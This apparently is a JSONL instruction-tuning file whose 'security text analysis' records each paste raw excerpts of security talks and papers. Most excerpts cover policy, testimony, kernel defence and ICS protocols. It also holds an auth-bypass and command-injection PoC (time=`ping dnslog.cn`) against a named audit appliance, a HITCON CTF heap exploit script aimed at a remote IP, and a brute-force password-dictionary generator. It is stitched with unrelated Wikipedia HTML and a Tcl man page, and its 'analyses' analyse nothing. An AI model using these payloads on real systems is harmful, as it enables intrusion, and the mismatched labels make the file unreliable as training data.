0x12345678 21 Asm to C條件跳躍 cmp eax,1 Jl 0x12345678  sub eax,1  Jl 0x12345678 22 Asm to C條件跳躍 cmp eax, 0 Je 0x12345678  test eax,eax //編譯器常用老梗  Jz 0x12345678  Je 0x12345678 23 Asm to C條件跳躍 cmp eax, 0 Je 0x12345678  or eax,eax  Je 0x12345678 24 cmp eax,0 Je 0x12345678  and eax,eax  Je 0x1234578 Asm to C條件跳躍 MessageBoxA( Arg1, Arg2, Arg3, Arg4); push Arg4 push Arg3 push Arg2 push Arg1 call MessageBoxA 25 Asm to C Call MessageBoxA( Arg1, Arg2, Arg3, Arg4); push Arg4 push Arg3 push Arg2 push Arg1 push 返回地址 Jmp MessageBoxA 26 Asm to C Call MessageBoxA( Arg1, Arg2, Arg3, Arg4); push Arg4 push Arg3 push Arg2 push Arg1 push 返回地址 push MessageBoxA ret 27 Asm to C Call ASM  CFor for (int i = 0; i < 500; i++) { /*...Do Anything You Want*/ } 28 ASM  CFor Project1._GetExceptDLLinfo+FFA - xor eax,eax Project1._GetExceptDLLinfo+FFC - mov [ebp-0C],eax Project1._GetExceptDLLinfo+FFF - inc [ebp-0C] . . . Project1._GetExceptDLLinfo+1002- cmp [ebp-0C],000001F4 Project1._GetExceptDLLinfo+1009- jnge Project1._GetExceptDLLinfo+FFF 29 for (int i = 2; i < 500; i++) { /*...Do Anything You Want*/ } 30 ASM", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHello, and Welcome. My name is Tom Ritter, and I work for iSEC Partners. If you dont know who Zax is, you will by the end of this talk. This talk is about an anonymity network that was started in the fledgling days of the Cypherpunk era  the early 1990s. This book hadnt even come out yet  this is the second edition. But this is the first edition, and it had come out, and the US had ruled you while you could export the book itself, you couldnt export the floppy disk with the source code. The United States government was actively investigating Phil Zimmerman for violating the Arms Control Export Act, for making the first few versions of PGP available. Dan Bernstein and the toddler-aged EFF went on the offensive taking the US government to court and suing over the export controls on cryptography. Another group of people ultimately printed the source code for PGP, exported the book to Europe, scanned it in, and OCR-ed it in 1997 releasing a version of PGP that bypassed export controls Alt.Anonymous.Messages was forged in the heyday of the cypherpunks, and really, overall, has changed very little in the intervening decade since it was last shaped in any major way. And in that decade, what we have seen is a monumental focus of the nations spy 1 agencies on not what was thought to be the most critical piece of information to encrypt  the content itself. But instead. 1 The people who know wont talk, and the people who talk dont know. But the leaked court orders require Verizon to turn over call records local and abroad. Now, Im talking here, so I dont know anything and am just speculating  but the most straightforward thing to do with this data is to build communication graphs. Analyze the metadata, looking for patterns. Identify people of interest, and figure out who they talk to. The metadata around an encrypted channel tells volumes. 2 SSL, is the most widely used encrypted channel on the internet today. And even ignoring the numerous attacks weve seen on it in the past ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMontana State Representative Daniel Zolnikov Politics and The Surveillance State. The Story of a Young Politicians Successful Efforts to Fight Surveillance and Pass the Nations Strongest Privacy Bills. About Daniel  From Roundup, Montana.  31 Years Old. First Served at 25 Years Old.  Chair of House Energy and Technology Committee.  Republican 3rdTerm State Legislator. 2 Year Terms.  Swimmer. Current MBA Student. Previous Speaker at DefCon 21.  Half Russian, Half Italian. All Chaos.  Still Uses a Blackberry. Legislation Sponsored & Passed  Nations First Warrant Requirement for GPS Location. 2013  Nations Strongest Freedom of the Press Law. 2015  Medical Immunity for Minors. 2015  Co-Sponsor Asset Forfeiture. 2015  Warrant Requirement for Electronic Devices. 2017  Warrant or 4th Amendment Subpoena Requirement for Electronic Communications. 2017  Severe Limits on License Plate Readers. 2017  Major Reforms and Restrictions for Vehicle Spot Checks. 2017 1st and 4th Amendment.  1stAmendment  Protects the Freedom of Religion, Speech, Press, Assembly, and to Petition.  4th Amendment  The right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated, and no Warrants shall issue, but upon probable cause, supported by Oath or affirmation, and particularly describing the place to be searched, and the persons or things to be seized.  Why is this Important? Self Censorship! Why Isnt Our Data Ours?  The Third Party Doctrine.  United States legal theory that holds that people who voluntarily give information to third partiessuch as banks, phone companies, internet service providers (ISPs), and e-mail servershave \"no reasonable expectation of privacy.  Outdated laws from 1986 removes warrant protections to emails over 180 days old.  Patriot Act.  Expanded the Governments ability to monitor, collect and retain the data of Americans and delay notification of these searches. NSA, Secret Courts and Vehic", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTestimony of Paul Vixie, Chairman & CEO Farsight Security, Inc. before the Subcommittee on Crime and Terrorism United States Senate Committee on the Judiciary Hearing on Taking Down Botnets: Public and Private Efforts to Disrupt and Dismantle Cybercriminal Networks July 15, 2014 I. INTRODUCTION Good afternoon Mr. Chairman, Ranking Member Graham, and Members of the Subcommittee. Thank you for inviting me to testify on the subject of botnet takedowns. My name is Paul Vixie, and I am the Chairman and Chief Executive Officer of Farsight Security, a commercial Internet security company. I am speaking today in my personal capacity based on a long history of building and securing Internet infrastructure. I am also here at the behest of the Messaging, Malware and Mobile Anti-Abuse Working Group (M3AAWG), a non-profit Internet security association whose international membership is actively working to improve Internet security conditions worldwide. I have first-hand knowledge of these matters from my experience in the Internet industry since 1988. My background includes serving as the Chief Technology Officer for Abovenet/MFN, an Internet Service Provider (ISP); serving as the founder and CEO of MAPS, the first anti-spam company; and acting as the operator of the F DNS root name server. I have also been involved in Internet standards work in the Internet Engineering Task Force (IETF) and policy development work in the Internet Corporation for Assigned Names and Numbers (ICANN). In addition, I served for nine years on the board of trustees of ARIN, a company responsible for allocating Internet address resources in the United States, Canada, and parts of the Caribbean. I presently serve on the ICANN Security and Stability Committee (SSAC) and the ICANN Root Server System Advisory Committee (RSSAC). I am the author of several Internet standards related to the Internet Domain Name System (DNS) and was for eleven years the maintainer of BIND, a popular open source DNS software sys", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSecurity at Kernel Level Philippe Biondi <biondi@cartel-securite.fr>  Defcon 10 August 2,3,4th, 2002 Outline 1  Why ?  Context  A new security model  Conclusion  How ?  Taxonomy of action paths  Defending kernel space  Filtering in kernel space  Implementations  Existing projects  LSM CARTEL SÉCURITÉ  Philippe Biondi Outline Why ? 2  Why ?  Context  A new security model  Conclusion  How ?  Taxonomy of action paths  Defending kernel space  Filtering in kernel space  Implementations  Existing projects  LSM CARTEL SÉCURITÉ  Philippe Biondi Why ? Context | New model | Conclusion 3 We would like to be protected from  Fun/hack/defacing  Tampering  Resources stealing  Data stealing  Destroying  DoS  . . . CARTEL SÉCURITÉ  Philippe Biondi Why ? Context | New model | Conclusion 4  Thus we must ensure  Confidentiality  Integrity  Availability  What do we do to ensure that ?  We define a set of rules describing the way we handle, protect and distribute information  This is called a security policy CARTEL SÉCURITÉ  Philippe Biondi Why ? Context | New model | Conclusion 5 To enforce our security policy, we will use some security software  Tripwire, AIDE, bsign, . . . for integrity checks  SSH, SSL, IP-SEC, PGP, . . . for confidentiality  Passwords, secure badges, biometric access controls, . . . for authentication  . . . Can we trust them ? Do they work in a trusted place ? CARTEL SÉCURITÉ  Philippe Biondi Why ? Context | New model | Conclusion 6 The mice and the cookies  Facts :  We have some cookies in a house  We want to prevent the mice from eating the cookies CARTEL SÉCURITÉ  Philippe Biondi Why ? Context | New model | Conclusion 7 The mice and the cookies  Solution 1 : we protect the house  too many variables to cope with (lots of windows, holes, . . . )  we cant know all the holes to lock them.  we cant be sure there werent any mice before we closed the holes I wont bet Ill eat cookies tomorrow.  Solution 2 : we put the cookies in a metal box  we can grasp the entire problem", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nVersion 3.0 DEFCON 10 August 2002 Anatomy of Denial of Service Mitigation Testing Version 3.0 Agenda  Why Test?  Methodology  Challenges and Lessons Learned  Findings Version 3.0 DOS-3 Denial of Service Mitigation Testing Version 3.0 WHY?  Desire to Protect  Infrastructure  Data  Business Continuity  Evaluate Emerging Technologies  Problem is just getting worse  Many nasty DOS and DDOS tools in the wild Version 3.0 2001 Survey Results Results of the 2001 Information Security Magazine Industry Survey shows increase in Denial of Service attacks experienced by the survey participants. Source: Information Security Magazine, 2001 Industry Survey, October 2001, pg 34-47. Version 3.0 DOS-6 2001 Survey Results  System unavailability is 4th highest INFOSEC concern Source: Information Security Magazine, 2001 Industry Survey, October 2001, pg 34-47. Version 3.0 DOS-7 2001 Survey Results  Security and Availability of Websites 2nd most important project listed Source: Information Security Magazine, 2001 Industry Survey, October 2001, pg 34-47. Version 3.0 DOS-8 What We Were Looking For  Infrastructure Protection  Minimum Gigabit Solutions (GigE and Fiber)  OC48 and OC192 capability desired  Customer Protection  Gigabit MM Fiber  GigE  10/100 Ethernet  Eventually OC48 and OC192 Version 3.0 DOS-9 Products Tested Passive tapped Solutions  Arbor Networks  Reactive Networks  Mazu Networks  Asta Networks In-line Solutions  Captus Networks  Mazu Networks  Basis of selection due to September 2001 Information Security Magazine Article, Denying Denial-of-Service. Version 3.0 DOS-10 Methodology Version 3.0 DOS-11 Todays DOS Prevention  Reverse Path Filtering (deny invalid IPs)  Allow only good traffic into your network (ingress filtering)  Allow only good traffic out of your network (egress filtering)  Stop directed broadcast traffic (to avoid being an amplifier) Version 3.0 Methodology  Imitate a customer hosting center  Run real tests across the infrastructure  Test both network function", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n<!DOCTYPE html> <html class=\"client-nojs\" lang=\"nb\" dir=\"ltr\"> <head> <meta charset=\"UTF-8\"/> <title>Norge  Wikipedia</title> <script>document.documentElement.className=document.documentElement.className.replace(/(|\\s)client-nojs(\\s|$)/,\"$1client-js$2\");RLCONF={\"wgCanonicalNamespace\":\"\",\"wgCanonicalSpecialPageName\":!1,\"wgNamespaceNumber\":0,\"wgPageName\":\"Norge\",\"wgTitle\":\"Norge\",\"wgCurRevisionId\":19502631,\"wgRevisionId\":19502631,\"wgArticleId\":728,\"wgIsArticle\":!0,\"wgIsRedirect\":!1,\"wgAction\":\"view\",\"wgUserName\":null,\"wgUserGroups\":[\"*\"],\"wgCategories\":[\"Sider med duplikate argumenter i malkall\",\"CS1-vedlikehold: Flere navn: redaktørliste\",\"Sider som bruker magiske ISBN-lenker\",\"Wikipedia semibeskyttede sider\",\"Artikler med koordinater\",\"Artikler hvor bilde mangler på Wikidata\",\"Artikler som trenger presiseringer\",\"Artikler som trenger referanser\",\"Artikler med offisielle lenker fra Wikidata\",\"Anbefalte artikler\",\"Artikler med autoritetsdatalenker fra Wikidata\",\"Norge\",\"Konstitusjonelle monarkier\",\"NATO-land\",\"EFTA\",\"Norden\"],\"wgBreakFrames\":!1,\"wgPageContentLanguage\":\"nb\",\"wgPageContentModel\":\"wikitext\", \"wgSeparatorTransformTable\":[\",\\t.\",\" \\t,\"],\"wgDigitTransformTable\":[\"\",\"\"],\"wgDefaultDateFormat\":\"dmy\",\"wgMonthNames\":[\"\",\"januar\",\"februar\",\"mars\",\"april\",\"mai\",\"juni\",\"juli\",\"august\",\"september\",\"oktober\",\"november\",\"desember\"],\"wgMonthNamesShort\":[\"\",\"jan.\",\"feb.\",\"mar.\",\"apr.\",\"mai\",\"jun.\",\"jul.\",\"aug.\",\"sep.\",\"okt.\",\"nov.\",\"des.\"],\"wgRelevantPageName\":\"Norge\",\"wgRelevantArticleId\":728,\"wgRequestId\":\"XRFAJApAICsAAKPAIPkAAAAR\",\"wgCSPNonce\":!1,\"wgIsProbablyEditable\":!1,\"wgRelevantPageIsProbablyEditable\":!1,\"wgRestrictionEdit\":[\"autoconfirmed\"],\"wgRestrictionMove\":[\"sysop\"],\"wgMediaViewerOnClick\":!0,\"wgMediaViewerEnabledByDefault\":!0,\"wgPopupsReferencePreviews\":!1,\"wgPopupsConflictsWithNavPopupGadget\":!1,\"wgVisualEditor\":{\"pageLanguageCode\":\"nb\",\"pageLanguageDir\":\"ltr\",\"pageVariantFallbacks\":\"nb\"},\"wgMFDisplayWikibaseDescriptions\":{\"search\":!0,\"nearby\":!0,\"watchlis", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAttacking the macOS Kernel Graphics Driver wang yu Didi Research America - About me - Background Pluto Flyby: The Story of a Lifetime, NASA, 2016 New Horizons Team Reacts to Latest Image of Pluto, NASA, 2015 9 Years, 3 Billion Miles: The Journey of New Horizons - Weapon X rootkit - Rubilyn rootkit - OS X/Crisis DAVINCI rootkit (Hacking Team) https://github.com/hackedteam/driver-macos - Inficere rootkit https://github.com/enzolovesbacon/inficere - Uninformed volume 4 - Abusing Mach on Mac OS X - Phrack magazine #64 - Mac OS X wars - a XNU Hope - Phrack magazine #66 - Developing Mac OS X Kernel Rootkits - Phrack magazine #69 - Revisiting Mac OS X Kernel Rootkits - Process/Dynamic library - File/Configuration - Kernel kext module - Network traffic - User mode/Kernel mode communication mechanism - Doubly-linked list manipulation - DKOM(Direct Kernel Object Manipulation)/Hot Patch - Dispatch table hook/Inline hook - Mach-O format parser/Kernel symbol - Kernel exploitation Windows/Android Linux/macOS Malware Man in the Binder - He who Controls IPC, Controls the Droid, Black Hat Europe 2014 1. Anti-debugging ( object hook sys_ptrace ) https://github.com/enzolovesbacon/inficere/blob/master/kext/inficere/anti.c#L312 2. Hide process ( object hook sys_sysctl ) https://github.com/enzolovesbacon/inficere/blob/master/kext/inficere/anti.c#L335 3. Hide file ( object hook sys_getdirentries/sys_getdirentries64/sys_getdirentriesattr ) https://github.com/enzolovesbacon/inficere/blob/master/kext/inficere/anti.c#L471 https://github.com/enzolovesbacon/inficere/blob/master/kext/inficere/anti.c#L542 https://github.com/enzolovesbacon/inficere/blob/master/kext/inficere/anti.c#L547 4. Hide user ( object hook sys_open_nocancel/sys_read_nocancel ) https://github.com/enzolovesbacon/inficere/blob/master/kext/inficere/anti.c#L615 https://github.com/enzolovesbacon/inficere/blob/master/kext/inficere/anti.c#L635 5. Self-protection ( object hook sys_kill ) https://github.com/enzolovesbacon/inficere/blo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n黑客眼中的工控4.0 工控系统安全威胁与应对探索 by Kimon 关于我  中国科技大学苏研院  ADF安全研究团队  物联网安全工控安全 qmwang@vip.126.com 13758178689 王启蒙 Kimon 提纲  工控背景  工控系统  入侵方式  应对探索 工业4.0与两化融合 工控系统  ICS 工业控制系统  SCADA 数据采集与监控系统  DCS 分散式控制系统 SCADA系统 SCADA系统 工控组件  PLC可编程逻辑控制器  RTU远程控制单元  HMI人机交互界面  现场设备 PLC  PLC实质是一种用于工业 的计算机  CPU存储器输入输出 接口电路功能模块通 信模块电源  输入采样阶段用户程序 执行阶段数据刷新阶段  梯形图LAD 顺序流程图SFC 指令表IL / ( 威胁趋势 ~2010 2010 2011 Duqu 2012 Flame 2013 Dragonfly ~2014 ICS-CERT 威胁来源 协议安全 网络隔离 安全意识 漏洞管理 工业网络协议  Modbus  S3/S5/S7  DNP3  Profinet  Ethernet/IP   Modbus协议  全球第一个真正用于工业现场 的总线协议  施耐德电子Schneider Electric发布于1979年  标准开放免费使用  目前作为工业标准工业网络传 输协议之一 Modbus协议  Master/Slave模式  8位地址长度每个Master可支 持247个Slave  简单清晰的协议内容  无加密与身份认证 master slave Initiate request Perform action Initiate response Receive response func code data req func code data resp Modbus Frame PDU ADU Modbus协议 Additional address Function code Data Error check Modbus TCP Frame IP Packet TCP Packet TransactionID 2 Byte ProtocolID 2 Byte Length 2 Byte Unit ID 1 Byte Function Code 1 Byte Data 256 or .. PDU ADU Modbus协议 Modbus协议 Function Name Function Code Read Coils Write Single Coil Write Multiple Coils Read Input Register Write Single Register Read/Write Multiple Register 0x01 0x05 0x15 0x04 0x06 0x23 Modbus协议 维基百科Modbus所有功能码 http://en.wikipedia.org/wiki/Modbus Modbus协议 TransactionID ProtocolID Length UnitID FunctionCode Data Modbus协议 RS-232/RS-485 Network Modbus TCP 入侵方式 工控组件脆弱性 工业化信息化融合推进 安全意识薄弱 设备升级维护成本高 更脆弱的系统 更多的攻击面 模拟环境 协议分析 设备识别 攻击工具/框架 手动攻击测试 探索发现目标 攻击面 模拟环境 [ModbusPal] Slave节点仿真模拟 http://modbuspal.sourceforge.net/ 网络分析 [Wireshark] https://www.wireshark.org/ Modbus/S7/DNP3协议解析 本地模拟攻防 [mbtget] Perl脚本Modbus协议工具 https://github.com/sourceperl/mbtget 本地模拟攻防 [Metasploit Framework] auxiliary/scanner/scada/modbus_findunitid auxiliary/scanner/scada/modbusclient auxiliary/scanner/scada/modbusdetected 探索发现目标 网络空间 搜索引擎 黑暗Google PLCRTU..工控设备 无一幸免 探索发现目标 [Nmap] modbus-discover.nse modbus-enum.nse 注意 NIST SP800-82 1.降低扫描速度scan-delay=1 2.TCP替代UDP 3.避免使用nmap指纹识别 -sC 4.不推荐nmap", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n放个垃圾设备,个章 某科云数据库审计与防护系统 源码来源: docker search hi****one 搜索到两个内容 这拉取 zhu***zaxy/hi****one 镜像 docker pull zhu***zaxy/hi****one 然后docker run启动,这启动需要注意下权限问题 附带参数 --privileged 后的些端映射需要去设置这只演示如何启动容器 docker run --privileged=true -it -d zhu***zaxy/hi****ne /usr/sbin/init 启动过后进容器 docker exec -it 容器id /bin/bash 全局搜索war包 发现有两个 /home/realstone/web/webapps/ROOT/UpG**ade.war /home/deploy/webdeploy2.0/webapps/ProtectPl**form.war 看了下内容第个war包才是web应的部署件 copy到物理机中 docker cp c3cb558add74:/home/deploy/webdeploy2.0/webapps/Protect**atform.war /Users/**/Downloads 然后就可以审计了 这套源码也挺简单 看了下web.xml中的些配置件发现filter中没有权限验证的操作但访问部分 路由仍会出现302的情况 该系统使Spring MVC直接追拦截器 Spring拦截器 HandlerInterceptorAdapter需要继承 HandlerInterceptor需要实现 主要的三种法 preHandle拦截于请求刚进时进判断需要boolean返回值如果返回true将继 续执如果返回false将不进执般于登录校验 postHandle拦截于法成功返回后视图渲染前可以对modelAndView进操作 postHandle拦截于法成功返回后视图渲染前可以对modelAndView进操作 afterCompletion拦截于法成功返回后视图渲染前可以进成功返回的志记 录 prehandle中先是验证了refer是否存在当前的主机地址 然后进路径检查 String url = request.getRequestURI(); boolean userAuth = Boolean.FALSE.booleanValue(); if (url.startsWith(\"/base/\") || url .startsWith(\"/receive/\")) return true; 这的url取的是 getRequestURI ,并且下是判断url开头是否为 /base/ 或 者 /receive/ 可以直接/base/../adderss来绕 确定了如何绕过那么就开始挖掘漏洞这类设备命令执应该挺多的全局搜 索 Runtime 发现某个法存在命令执 并且在Controller中存在调 然后然后就直接RCE了 POC: POST /base/../systemConfig/****systime time=`ping dnslog.cn`", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Writeup Tokyo Westerns/MMA CTF 2016 Team: akrasuski, c7f.m0d3, cr019283, ppr, shalom, nazywam, rev, msm ### Table of contents * [Backpacker's Cipher (Crypto)](backpacker) * [Whiteout Mathmatics (Reverse, PPC)](whiteout_mathematics) * [Private/Local/Comment (PPC)](restricted_ruby) * [Rotten Uploader (Web)](rotten_uploader)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSP 0:00:00 PLAY Whitney B. Merrill Attorney & Hacker @wbm312 Tech & the FTC Terrell McSweeny Commissioner Federal Trade Commission @TMcSweenyFTC DISCLOSURE The views expressed do not necessarily reflect the views of the Commission or any individual Commissioner. -- MENU -- WHAT IS THE FTC LOOKING BACK THE PRESENT LOOKING FORWARD Q&A -- MENU -- WHAT IS THE FTC LOOKING BACK THE PRESENT LOOKING FORWARD Q&A It's standard stuff, it's just in a new medium. http://articles.chicagotribune.com/1996-03-15/news/9603150062_1_ftc-lawyers-deceptive-computer-chips -- FRAUD -- Brian Corzine d/b/a/ Chase Consulting (1994) The First Internet Case First federal enforcement agency to take such an action BRANDZEL (1996) Sources: Network World, March 18, 1996. Mail Order Rule applied to Internet \"supplying the world with computer parts Offered computer memory chips for sale on Usenet Users never received chips -- DECEPTIVE ADVERTISING -- Site for Sore Eyes, Inc. (1993) Protecting the userseyes PROTECTION FROM UV RAYS TREATMENT: UV400: UV protective coating will protect your eyes from the harmful rays of the sun as well as from computer screens. UV radiation can cause redness and irritation to the eyes  and can also cause irreversible damage to the retina and cornea. This clear, non-toxic formula protects your eyes by absorbing 99% of all harmful UV rays.\" Hayes Microcomputer Products, Inc. (1994) FUD: Tick, Tick, Tick. Boom Youre Dead! A time bomb may be lurking inside your modem. FTC Complaint against Hayes Microcomputer A modems failure to incorporate the Improved Escape Sequence with Guard Time does not create a substantial risk of data destruction. Ads could not misrepresent the extent to which . . . any product or service will reduce the risk of unauthorized access into such computer, or any such similar system . . . . and the extent to which any such product or service will maintain, protect, or provide security features that will enhance the security or privacy of any such computer", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n原文 by [Web攻防之暴力破解](https://mp.weixin.qq.com/s?__biz=MzI1NDg4MTIxMw==&mid=2247483704&idx=1&sn=8034515a35a30ecc148ac489cf31e976&chksm=ea3f3deadd48b4fc15bc6b18d814856ded1cdc09e01e39dd5c8927b7003e62e2694b319cf1b4&mpshare=1&scene=1&srcid=1128xiKQwQLEHKGT3docayMh#rd) ## 0x00 序 攻防之初大多为绕过既有逻辑和认证以Getshell为节点不管是SQL注入获得管理员数据还是XSS 获得后台cookie大多数是为了后台的登录权限假若我们获得一枚口令都是柳暗花明不管口令复杂与否只要在构造的字典内都是爆破之结晶 Web形态及业务之错综我们暂可将能够自定义字典的请求归类到爆破以便信息的提炼和知识的逻辑推理 本文主要收集了常用的一些爆破相关的零碎点和技巧点 ## 0x01 账户探测 探测存在与否 第一梯队Top500用户名手机号 第二梯队邮箱员工编号 ## 0x02 指定口令爆破用户名 1. 指定类123456口令爆破用户名 2. 正常的top500top10000帐号 3. 单个字母两个字母三个字母四个字母随机组合的帐号 a) 小工具pydictor值得推荐 `python pydictor.py -base L --len 2 3` b) Burp也可以 4. 一位数字二位数字三位数字四位数字的随机组合 ``` for n in xrange(10000): print str(n).zfill(4) ``` 5. 厂商名相关帐号 a) 如facebookfb_steven  b) 页面联系邮箱的规则学习及自创建 ## 0x03 密码爆破 1. top500, top3000,top10000自定义密码 a) Top 系列几乎安全从业都有自己的弱口令字典常规就好太大的字典跑起来也费劲关键是定制 b) 定制字典pydictor值得推荐https://github.com/LandGrey/pydictor c) 社工库的使用指定用户的历史密码是一种尝试 2. 厂商特色口令生成如baidu@123 a) 适用于应用管理员类人员以及主机协议类密码 b) 更多定制类字典也可以pydicor c) 使用简单密码和厂商邮箱后缀组合 ``` python #coding=utf-8 import sys key = sys.argv[1] f = open(\"%s.txt\"%key,\"a\") list1 = [123,321,1234,4321,123456,654321,12345678,123456789,1234567890,888,8888,666,6666,163,521,1314,1,11,111,1111,2,222,3,333,5,555,9,999] list2 = ['#123','#1234','#123456','@123','@1234','@123456','@qq.com','qq.com','@123.com','123.com','@163.com','163.com','126.com','!@#','!@#$','!@#$%','098'] for j1 in list1: pwd1 = key + str(j1) + '\\n' f.write(pwd1) for j2 in list2: pwd2 = key+str(j2)+'\\n' f.write(pwd2) for i in range(1980,2016): #pwd1 = key + str(i) + '\\n' pwd3 = '{}{}{}'.format(key,i,'\\n') f.write(pwd3) f.close() print key+' password combination ok!!!' ``` 3. 加密密码暴力破解 a) 普通编码类如base64 b) 自定义加密算法目标系统使用了可猜测的加密算法去加密口令 可参考浮萍写的基于RSA算法加密口令后爆破脚本 https://github.com/fupinglee/MyPython/blob/master/web/RSADemo.py c) Selenium 自动浏览器提交模块可适用与不明加密算法模拟正常操作流 4. 弱文件后的后台爆破 a) 弱文件爆破获得后台 b) 后台密码爆破 i. 各大中间件及CMS的口令破解如weblogic tomcat ii. 自定义后台的密码破解 5. Webshell 密码爆破 a) Shel", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2018 hitcon CTF By Nu1L https://ctf2018.hitcon.org/ 2018/10/20 02:00 UTC ~ 2018/10/22 02:00 UTC PWN children tcache from pwn import * #p=process('./child',env={'LD_PRELOAD':'./libc.so.6'}) p=remote('54.178.132.125', 8763) libc = ELF('./libc.so.6') def add(size,data): p.recvuntil('choice') p.sendline('1') p.recvuntil('Size:') p.sendline(str(size)) p.recvuntil('Data:') p.send(data) def dele(index): p.recvuntil('choice') p.sendline('3') p.recvuntil('Index') p.sendline(str(index)) for i in range(7): add(0x80,'xxx\\n') for i in range(7): dele(i) for i in range(7): add(0x110-8,'xxx\\n') add(0x110-8,'aaaa\\n')#7 add(0x100,'bbbb\\n')#8 add(0x100,'cccc\\n')#9 for i in range(7): dele(i) dele(8) dele(7) #raw_input() for i in range(7): add(0x110-8,'aaaa\\n') #0-6 add(0x110-8,'a'*(0x110-8))#7 for i in range(7): dele(i) #raw_input() for i in range(7): add(0x80,'1234567\\n')#0-6 add(0x80,'xxxxxxxx\\n')#8 for i in range(7): dele(i) add(0x60,'ABCD\\n')#0 dele(8) dele(9) add(0x40,'a\\n')#1 add(0x30,'b\\n')#2 add(0x500,'aaaa\\n')#3 add(0x120,'bbbb\\n')#4 #0,3->same chunk dele(3) p.recvuntil('choice') p.sendline('2') p.recvuntil(\"Index:\") p.sendline('0') addr = u64(p.recv(6).ljust(8,'\\x00')) libc_base = addr - (0x00007f2e9c12dca0-0x7f2e9bd42000) info(\"libc:0x%x\",libc_base) malloc_hook = libc_base+libc.symbols['__malloc_hook'] info(\"malloc hook:0x%x\",malloc_hook) one = libc_base + 0x10a38c add(0x500,'aaaaa\\n')#3 dele(3) add(0x120,'ABCDABCD\\n') dele(4) dele(3) dele(0) add(0x120,p64(malloc_hook)+'\\n') add(0x120,p64(one)+'\\n') add(0x120,p64(one)+'\\n') Groot p.sendline('1') p.sendline('304') p.interactive() #!/usr/bin/env python2 # coding:utf-8 from pwn import * import os VERBOSE = 1 DEBUG = 1 LOCAL = 0 target = 'groot' libc = [] # libc break_points = [] remote_addr = '54.238.202.201' remote_port = 31733 def hint(break_points=[]): if LOCAL: out = 'gdb attach ' + str(pwnlib.util.proc.pidof(target)[0]) for bp in break_points: out += \" -ex 'b *{}'\".format(hex(bp)) raw_input(out+\" -ex 'c'\\n\" if break_points", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" '\\\" Copyright (c) 1994 The Regents of the University of California. '\\\" Copyright (c) 1994-1996 Sun Microsystems, Inc. '\\\" '\\\" See the file \"license.terms\" for information on usage and redistribution '\\\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\\\" '\\\" RCS: @(#) $Id: clipboard.n,v 1.2 2003/11/24 05:09:59 bbbush Exp $ '\\\" '\\\" The definitions below are for supplemental macros used in Tcl/Tk '\\\" manual entries. '\\\" '\\\" .AP type name in/out ?indent? '\\\" Start paragraph describing an argument to a library procedure. '\\\" type is type of argument (int, etc.), in/out is either \"in\", \"out\", '\\\" or \"in/out\" to describe whether procedure reads or modifies arg, '\\\" and indent is equivalent to second arg of .IP (shouldn't ever be '\\\" needed; use .AS below instead) '\\\" '\\\" .AS ?type? ?name? '\\\" Give maximum sizes of arguments for setting tab stops. Type and '\\\" name are examples of largest possible arguments that will be passed '\\\" to .AP later. If args are omitted, default tab stops are used. '\\\" '\\\" .BS '\\\" Start box enclosure. From here until next .BE, everything will be '\\\" enclosed in one large box. '\\\" '\\\" .BE '\\\" End of box enclosure. '\\\" '\\\" .CS '\\\" Begin code excerpt. '\\\" '\\\" .CE '\\\" End code excerpt. '\\\" '\\\" .VS ?version? ?br? '\\\" Begin vertical sidebar, for use in marking newly-changed parts '\\\" of man pages. The first argument is ignored and used for recording '\\\" the version when the .VS was added, so that the sidebars can be '\\\" found and removed when they reach a certain age. If another argument '\\\" is present, then a line break is forced before starting the sidebar. '\\\" '\\\" .VE '\\\" End of vertical sidebar. '\\\" '\\\" .DS '\\\" Begin an indented unfilled display. '\\\" '\\\" .DE '\\\" End of indented unfilled display. '\\\" '\\\" .SO '\\\" Start of list of standard options for a Tk widget. The '\\\" options follow on successive lines, in four columns separated '\\\" by tabs. '\\\" '\\\" .SE '\\\" End of list of standard options for a Tk widget. '\\\" '\\\" .OP cmdName dbName dbC", "category": "text_analysis", "source": "security_papers"}
